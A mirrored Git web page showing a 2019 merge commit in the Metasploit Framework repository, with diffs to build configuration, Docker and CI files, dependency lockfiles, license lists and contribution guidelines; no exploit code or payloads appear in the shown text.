infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into land-10812-

GSoC/Meterpreter_Web_Console
Brent Cook 2019-02-07 09:31:02 -06:00
parent e0f597f25f 7cd477b495
commit 5fc7167beb
770 changed files with 38692 additions and 5342 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.dockerignore
View File

@ -5,6 +5,8 @@ docker-compose*.yml
docker/
!docker/msfconsole.rc
!docker/entrypoint.sh
!docker/database.yml
Dockerfile
README.md
.git/
.github/

2
.github/PULL_REQUEST_TEMPLATE.md vendored
View File

@ -2,6 +2,8 @@
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
## Verification
List the steps needed to make sure this thing works

1
.mailmap
View File

@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github> <William_Webb@rapid7.com>
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
bcoles <bcoles@github> bcoles <bcoles@gmail.com>
bcoles <bcoles@github> Brendan Coles <bcoles@gmail.com>
bokojan <bokojan@github> parzamendi-r7 <peter_arzamendi@rapid7.com>
brandonprry <brandonprry@github> <bperry@brandons-mbp.attlocal.net>
brandonprry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>

2
.ruby-version
View File

@ -1 +1 @@
2.5.1
2.5.3

12
.travis.yml
View File

@ -11,22 +11,23 @@ addons:
- graphviz
language: ruby
rvm:
- '2.3.7'
- '2.4.4'
- '2.5.1'
- '2.3.8'
- '2.4.5'
- '2.5.3'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
# Used for testing the remote data service
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
matrix:
fast_finish: true
exclude:
- rvm: '2.3.7'
- rvm: '2.3.8'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
- rvm: '2.4.4'
- rvm: '2.4.5'
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
jobs:
@ -48,6 +49,7 @@ before_install:
- ls -la ./.git/hooks
- ./.git/hooks/post-merge
# Update the bundler
- gem update --system
- gem install bundler
before_script:
- cp config/database.yml.travis config/database.yml

2
CODE_OF_CONDUCT.md
View File

@ -37,7 +37,7 @@ when an individual is representing the project or its community.
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project maintainers at msfdev@metasploit.com. If
the incident involves a committer, you may report directly to
egypt@metasploit.com or todb@metasploit.com.
caitlin_condon@rapid7.com or todb@metasploit.com.
All complaints will be reviewed and investigated and will result in a
response that is deemed necessary and appropriate to the circumstances.

114
CONTRIBUTING.md
View File

@ -1,82 +1,54 @@
# Hello, World!
Thanks for your interest in making Metasploit -- and therefore, the
world -- a better place!
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
Please try to be as specific as you can about your problem; include steps
to reproduce (cut and paste from your console output if it's helpful) and
what you were expecting to happen.
Are you about to report a security vulnerability in Metasploit itself?
How ironic! Please take a look at Rapid7's [Vulnerability
Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
your report to security@rapid7.com using our [PGP key].
Are you about to contribute some new functionality, a bug fix, or a new
Metasploit module? If so, read on...
world -- a better place! Before you get started, review our
[Code of Conduct]. There are mutliple ways to help beyond just writing code:
- [Submit bugs and feature requests] with detailed information about your issue or idea.
- [Help fellow users with open issues] or [help fellow committers test recent pull requests].
- [Report a security vulnerability in Metasploit itself] to Rapid7.
- Submit an updated or brand new module! We are always eager for exploits, scanners, and new
integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
# Contributing to Metasploit
What you see here in CONTRIBUTING.md is a bullet point list of the do's
and don'ts of how to make sure *your* valuable contributions actually
make it into Metasploit's master branch.
If you care not to follow these rules, your contribution **will** be
closed. Sorry!
This is intended to be a **short** list. The [wiki] is much more
exhaustive and reveals many mysteries. If you read nothing else, take a
look at the standard [development environment setup] guide
and Metasploit's [Common Coding Mistakes].
Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
it into Metasploit's master branch. If you do not care to follow these rules, your contribution
**will** be closed. Sorry!
## Code Contributions
* **Do** stick to the [Ruby style guide].
* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
* **Do** follow the [50/72 rule] for Git commit messages.
* **Don't** use the default merge messages when merging from other branches.
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
* **Do** create a [topic branch] to work on instead of working directly on `master`.
If you do not send a PR from a topic branch, the history of your PR will be
lost as soon as you update your own master branch. See
https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
this in action.
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
you update your own master branch.
### Pull Requests
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
* **Do** target your pull request to the **master branch**.
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
* **Do** list [verification steps] so your code is testable.
* **Do** [reference associated issues] in your pull request description.
* **Do** write [release notes] once a pull request is landed.
* **Don't** leave your pull request description blank.
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
Pull request [PR#9966] is a good example to follow.
#### New Modules
* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
* **Do** use the many module mixin [API]s.
* **Don't** include more than one module per pull request.
* **Do** include instructions on how to setup the vulnerable environment or software.
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
#### Scripts
* **Don't** submit new [scripts]. Scripts are shipped as examples for
automating local tasks, and anything "serious" can be done with post
modules and local exploits.
* **Do** include [Module Documentation] showing sample run-throughs.
* **Don't** submit new [scripts]. Scripts are shipped as examples for automating local tasks, and
anything "serious" can be done with post modules and local exploits.
#### Library Code
* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
* **Do** follow [Better Specs] - it's like the style guide for specs.
* **Do** write [YARD] documentation - this makes it easier for people to use your code.
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
#### Bug Fixes
* **Do** include reproduction steps in the form of verification steps.
* **Do** include a link to any corresponding [Issues] in the format of
`See #1234` in your commit description.
* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
## Bug Reports
* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
When reporting Metasploit issues:
* **Do** write a detailed description of your bug and use a descriptive title.
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
* **Don't** file duplicate reports; search for your bug before filing a new report.
If you need some more guidance, talk to the main body of open
source contributors over on the [Freenode IRC channel],
or e-mail us at the [metasploit-hackers] mailing list.
If you need some more guidance, talk to the main body of open source contributors over on our
[Metasploit Slack] or [#metasploit on Freenode IRC].
Also, **thank you** for taking the few moments to read this far! You're
already way ahead of the curve, so keep it up!
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
curve, so keep it up!
[Issue Tracker]:http://r-7.co/MSF-BUGv1
[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
[wiki]:https://github.com/rapid7/metasploit-framework/wiki
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[development environment setup]:http://r-7.co/MSF-DEV
[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
[development environment]:http://r-7.co/MSF-DEV
[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
[Rubocop]:https://rubygems.org/search?query=rubocop
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
[API]:https://rapid7.github.io/metasploit-framework/api
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[RSpec]:http://rspec.info
[Better Specs]:http://betterspecs.org
[YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
[Metasploit Slack]:https://www.metasploit.com/slack
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4

25
Dockerfile
View File

@ -1,12 +1,12 @@
FROM ruby:2.5.1-alpine3.7 AS builder
FROM ruby:2.5.3-alpine3.7 AS builder
LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV APP_HOME=/usr/src/metasploit-framework
ENV BUNDLE_IGNORE_MESSAGES="true"
WORKDIR $APP_HOME
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
@ -37,26 +37,31 @@ RUN apk add --no-cache \
&& chmod -R a+r /usr/local/bundle
FROM ruby:2.5.1-alpine3.7
FROM ruby:2.5.3-alpine3.7
LABEL maintainer="Rapid7"
ENV APP_HOME /usr/src/metasploit-framework/
ENV APP_HOME=/usr/src/metasploit-framework
ENV NMAP_PRIVILEGED=""
ENV METASPLOIT_GROUP=metasploit
COPY --from=builder /usr/local/bundle /usr/local/bundle
COPY . $APP_HOME
# used for the copy command
RUN addgroup -S $METASPLOIT_GROUP
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
COPY --chown=root:metasploit . $APP_HOME/
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
WORKDIR $APP_HOME
# we need this entrypoint to dynamically create a user
# matching the hosts UID and GID so we can mount something
# from the users home directory. If the IDs don't match
# it results in access denied errors. Once docker has
# a solution for this we can revert it back to normal
# it results in access denied errors.
ENTRYPOINT ["docker/entrypoint.sh"]
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]

2
Gemfile
View File

@ -3,6 +3,8 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework'
gem 'sqlite3', '~>1.3.0'
# separate from test as simplecov is not run on travis-ci
group :coverage do
# code coverage for tests

123
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (5.0.0)
metasploit-framework (5.0.5)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -9,8 +9,10 @@ PATH
bcrypt
bcrypt_pbkdf
bit-struct
concurrent-ruby (= 1.0.5)
dnsruby
ed25519
em-http-request
faker
filesize
jsobfu
@ -19,9 +21,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.52)
metasploit-payloads (= 1.3.61)
metasploit_data_models
metasploit_payloads-mettle (= 0.4.2)
metasploit_payloads-mettle (= 0.5.6)
mqtt
msgpack
nessus_rest
@ -66,7 +68,6 @@ PATH
sinatra
sqlite3
sshkey
sysrandom
thin
tzinfo
tzinfo-data
@ -79,27 +80,27 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.0.3)
actionpack (4.2.10)
actionview (= 4.2.10)
activesupport (= 4.2.10)
actionpack (4.2.11)
actionview (= 4.2.11)
activesupport (= 4.2.11)
rack (~> 1.6)
rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.10)
activesupport (= 4.2.10)
actionview (4.2.11)
activesupport (= 4.2.11)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.10)
activesupport (= 4.2.10)
activemodel (4.2.11)
activesupport (= 4.2.11)
builder (~> 3.1)
activerecord (4.2.10)
activemodel (= 4.2.10)
activesupport (= 4.2.10)
activerecord (4.2.11)
activemodel (= 4.2.11)
activesupport (= 4.2.11)
arel (~> 6.0)
activesupport (4.2.10)
activesupport (4.2.11)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
@ -118,33 +119,43 @@ GEM
builder (3.2.3)
coderay (1.1.2)
concurrent-ruby (1.0.5)
cookiejar (0.3.3)
crass (1.0.4)
daemons (1.2.6)
daemons (1.3.1)
diff-lcs (1.3)
dnsruby (1.61.2)
addressable (~> 2.5)
docile (1.3.1)
ed25519 (1.2.4)
em-http-request (1.1.5)
addressable (>= 2.3.4)
cookiejar (!= 0.3.1)
em-socksify (>= 0.3)
eventmachine (>= 1.0.3)
http_parser.rb (>= 0.6.0)
em-socksify (0.3.2)
eventmachine (>= 1.0.0.beta.4)
erubis (2.7.0)
eventmachine (1.2.7)
factory_bot (4.11.1)
activesupport (>= 3.0.0)
factory_bot_rails (4.11.1)
factory_bot (~> 4.11.1)
railties (>= 3.0.0)
factory_bot (5.0.0)
activesupport (>= 4.2.0)
factory_bot_rails (5.0.0)
factory_bot (~> 5.0.0)
railties (>= 4.2.0)
faker (1.9.1)
i18n (>= 0.7)
faraday (0.15.3)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
filesize (0.2.0)
fivemat (1.3.7)
hashery (2.1.2)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
json (2.1.0)
loofah (2.2.2)
loofah (2.2.3)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
metasm (1.0.3)
@ -152,12 +163,12 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (3.0.1)
metasploit-credential (3.0.3)
metasploit-concern
metasploit-model
metasploit_data_models (>= 3.0.0)
net-ssh
pg (~> 0.15)
pg
railties
rex-socket
rubyntlm
@ -166,39 +177,39 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.52)
metasploit_data_models (3.0.1)
metasploit-payloads (1.3.61)
metasploit_data_models (3.0.5)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
metasploit-concern
metasploit-model
pg (= 0.20.0)
pg
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.4.2)
method_source (0.9.0)
mini_portile2 (2.3.0)
metasploit_payloads-mettle (0.5.6)
method_source (0.9.2)
mini_portile2 (2.4.0)
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.4)
msgpack (1.2.6)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (5.0.2)
net-ssh (5.1.0)
network_interface (0.0.2)
nexpose (7.2.1)
nokogiri (1.8.4)
mini_portile2 (~> 2.3.0)
octokit (4.12.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openssl-ccm (1.2.2)
openvas-omp (0.0.4)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.13.0)
pdf-reader (2.1.0)
pdf-reader (2.2.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
@ -210,11 +221,11 @@ GEM
activerecord (~> 4.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.11.3)
pry (0.12.2)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
public_suffix (3.0.3)
rack (1.6.10)
rack (1.6.11)
rack-protection (1.5.5)
rack
rack-test (0.6.3)
@ -227,19 +238,19 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.4)
loofah (~> 2.2, >= 2.2.2)
railties (4.2.10)
actionpack (= 4.2.10)
activesupport (= 4.2.10)
railties (4.2.11)
actionpack (= 4.2.11)
activesupport (= 4.2.11)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (12.3.1)
rake (12.3.2)
rb-readline (0.5.5)
recog (2.1.24)
recog (2.1.45)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.13)
rex-text
rex-bin_tools (0.1.4)
rex-bin_tools (0.1.6)
metasm
rex-arch
rex-core
@ -250,7 +261,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.19)
rex-exploitation (0.1.20)
jsobfu
metasm
rex-arch
@ -290,13 +301,13 @@ GEM
rspec-mocks (~> 3.8.0)
rspec-core (3.8.0)
rspec-support (~> 3.8.0)
rspec-expectations (3.8.1)
rspec-expectations (3.8.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-mocks (3.8.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.8.0)
rspec-rails (3.8.0)
rspec-rails (3.8.2)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
@ -309,7 +320,7 @@ GEM
rspec-support (3.8.0)
ruby-macho (2.1.0)
ruby-rc4 (0.1.5)
ruby_smb (1.0.4)
ruby_smb (1.0.5)
bindata
rubyntlm
windows_error
@ -330,19 +341,18 @@ GEM
sqlite3 (1.3.13)
sshkey (1.9.0)
swagger-blocks (2.0.2)
sysrandom (1.0.5)
thin (1.7.2)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (0.20.0)
thor (0.20.3)
thread_safe (0.3.6)
tilt (2.0.8)
tilt (2.0.9)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2018.5)
tzinfo-data (1.2018.9)
tzinfo (>= 1.0.0)
warden (1.2.7)
rack (>= 1.0)
@ -351,7 +361,7 @@ GEM
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0)
yard (0.9.16)
yard (0.9.18)
PLATFORMS
ruby
@ -367,9 +377,10 @@ DEPENDENCIES
rspec-rails
rspec-rerun
simplecov
sqlite3 (~> 1.3.0)
swagger-blocks
timecop
yard
BUNDLED WITH
1.16.4
1.17.3

6
LICENSE
View File

@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
Copyright: 2009 Vertive, Inc.
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
Files: lib/msf/core/modules/external/python/async_timeout/*
Copyright: 2016-2017 Andrew Svetlov
License: Apache 2.0
@ -115,7 +111,7 @@ Files: data/webcam/api.js
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
License: MIT
Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
Copyright: Copyright 2018 SmartBear Software
License: Apache 2.0

147
LICENSE_GEMS
View File

@ -1,135 +1,136 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
Ascii85, 1.0.3, MIT
actionpack, 4.2.10, MIT
actionview, 4.2.10, MIT
activemodel, 4.2.10, MIT
activerecord, 4.2.10, MIT
activesupport, 4.2.10, MIT
actionpack, 4.2.11, MIT
actionview, 4.2.11, MIT
activemodel, 4.2.11, MIT
activerecord, 4.2.11, MIT
activesupport, 4.2.11, MIT
addressable, 2.5.2, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT
arel-helpers, 2.6.1, MIT
backports, 3.11.1, MIT
bcrypt, 3.1.11, MIT
arel-helpers, 2.8.0, MIT
backports, 3.11.4, MIT
bcrypt, 3.1.12, MIT
bcrypt_pbkdf, 1.0.0, MIT
bindata, 2.4.3, ruby
bindata, 2.4.4, ruby
bit-struct, 0.16, ruby
builder, 3.2.3, MIT
bundler, 1.16.1, MIT
bundler, 1.17.3, MIT
coderay, 1.1.2, MIT
concurrent-ruby, 1.0.5, MIT
crass, 1.0.3, MIT
cookiejar, 0.3.3, unknown
crass, 1.0.4, MIT
daemons, 1.3.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.2, "Apache 2.0"
docile, 1.3.0, MIT
dnsruby, 1.61.2, "Apache 2.0"
docile, 1.3.1, MIT
ed25519, 1.2.4, MIT
em-http-request, 1.1.5, MIT
em-socksify, 0.3.2, MIT
erubis, 2.7.0, MIT
factory_bot, 4.8.2, MIT
factory_bot_rails, 4.8.2, MIT
faker, 1.8.7, MIT
faraday, 0.14.0, MIT
filesize, 0.1.1, MIT
fivemat, 1.3.6, MIT
google-protobuf, 3.5.1, "New BSD"
googleapis-common-protos-types, 1.0.1, "Apache 2.0"
googleauth, 0.6.2, "Apache 2.0"
grpc, 1.8.3, "Apache 2.0"
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 5.0.0, MIT
factory_bot_rails, 5.0.0, MIT
faker, 1.9.1, MIT
faraday, 0.15.4, MIT
filesize, 0.2.0, MIT
fivemat, 1.3.7, MIT
hashery, 2.1.2, "Simplified BSD"
http_parser.rb, 0.6.0, MIT
i18n, 0.9.5, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby
jwt, 2.1.0, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT
loofah, 2.2.0, MIT
memoist, 0.16.0, MIT
loofah, 2.2.3, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 1.0.0, "New BSD"
metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.13, "New BSD"
metasploit-framework, 5.0.0, "New BSD"
metasploit-credential, 3.0.2, "New BSD"
metasploit-framework, 5.0.5, "New BSD"
metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.16, "New BSD"
metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
method_source, 0.9.0, MIT
mini_portile2, 2.3.0, MIT
metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
metasploit_data_models, 3.0.4, "New BSD"
metasploit_payloads-mettle, 0.5.4, "3-clause (or ""modified"") BSD"
method_source, 0.9.2, MIT
mini_portile2, 2.4.0, MIT
minitest, 5.11.3, MIT
mqtt, 0.5.0, MIT
msgpack, 1.2.4, "Apache 2.0"
multi_json, 1.13.1, MIT
msgpack, 1.2.6, "Apache 2.0"
multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT
net-ssh, 4.2.0, MIT
net-ssh, 5.1.0, MIT
network_interface, 0.0.2, MIT
nexpose, 7.2.0, BSD
nokogiri, 1.8.2, MIT
octokit, 4.8.0, MIT
openssl-ccm, 1.2.1, MIT
nexpose, 7.2.1, "New BSD"
nokogiri, 1.10.1, MIT
octokit, 4.13.0, MIT
openssl-ccm, 1.2.2, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.1.0, MIT
pcaprub, 0.13.0, LGPL-2.1
pdf-reader, 2.2.0, MIT
pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT
pry, 0.11.3, MIT
public_suffix, 3.0.2, MIT
rack, 1.6.9, MIT
postgres_ext, 3.0.1, MIT
pry, 0.12.2, MIT
public_suffix, 3.0.3, MIT
rack, 1.6.11, MIT
rack-protection, 1.5.5, MIT
rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.9, MIT
rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.10, MIT
rake, 12.3.0, MIT
rails-html-sanitizer, 1.0.4, MIT
railties, 4.2.11, MIT
rake, 12.3.2, MIT
rb-readline, 0.5.5, BSD
recog, 2.1.18, unknown
recog, 2.1.45, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.13, "New BSD"
rex-bin_tools, 0.1.4, "New BSD"
rex-bin_tools, 0.1.6, "New BSD"
rex-core, 0.1.13, "New BSD"
rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.17, "New BSD"
rex-exploitation, 0.1.20, "New BSD"
rex-java, 0.1.5, "New BSD"
rex-mime, 0.1.5, "New BSD"
rex-nop, 0.1.1, "New BSD"
rex-ole, 0.1.6, "New BSD"
rex-powershell, 0.1.77, "New BSD"
rex-powershell, 0.1.79, "New BSD"
rex-random_identifier, 0.1.4, "New BSD"
rex-registry, 0.1.3, "New BSD"
rex-rop_builder, 0.1.3, "New BSD"
rex-socket, 0.1.10, "New BSD"
rex-socket, 0.1.15, "New BSD"
rex-sslscan, 0.1.5, "New BSD"
rex-struct2, 0.1.2, "New BSD"
rex-text, 0.2.17, "New BSD"
rex-text, 0.2.21, "New BSD"
rex-zip, 0.1.3, "New BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.7.0, MIT
rspec-core, 3.7.1, MIT
rspec-expectations, 3.7.0, MIT
rspec-mocks, 3.7.0, MIT
rspec-rails, 3.7.2, MIT
rspec, 3.8.0, MIT
rspec-core, 3.8.0, MIT
rspec-expectations, 3.8.2, MIT
rspec-mocks, 3.8.0, MIT
rspec-rails, 3.8.2, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.7.1, MIT
ruby-macho, 1.1.0, MIT
rspec-support, 3.8.0, MIT
ruby-macho, 2.1.0, MIT
ruby-rc4, 0.1.5, MIT
ruby_smb, 0.0.23, "New BSD"
ruby_smb, 1.0.5, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
rubyzip, 1.2.2, "Simplified BSD"
sawyer, 0.8.1, MIT
signet, 0.8.1, "Apache 2.0"
simplecov, 0.16.0, MIT
simplecov, 0.16.1, MIT
simplecov-html, 0.10.2, MIT
sinatra, 1.4.8, MIT
sqlite3, 1.3.13, "New BSD"
sshkey, 1.9.0, MIT
thor, 0.20.0, MIT
swagger-blocks, 2.0.2, MIT
thin, 1.7.2, "GPLv2+, Ruby 1.8"
thor, 0.20.3, MIT
thread_safe, 0.3.6, "Apache 2.0"
tilt, 2.0.9, MIT
timecop, 0.9.1, MIT
ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 1.2.5, MIT
tzinfo-data, 1.2018.3, MIT
tzinfo-data, 1.2018.9, MIT
warden, 1.2.7, MIT
windows_error, 0.1.2, BSD
xdr, 2.0.0, "Apache 2.0"
xmlrpc, 0.3.0, ruby
yard, 0.9.12, MIT
yard, 0.9.18, MIT

2
config/database.yml.travis
View File

@ -14,7 +14,7 @@ development: &pgsql
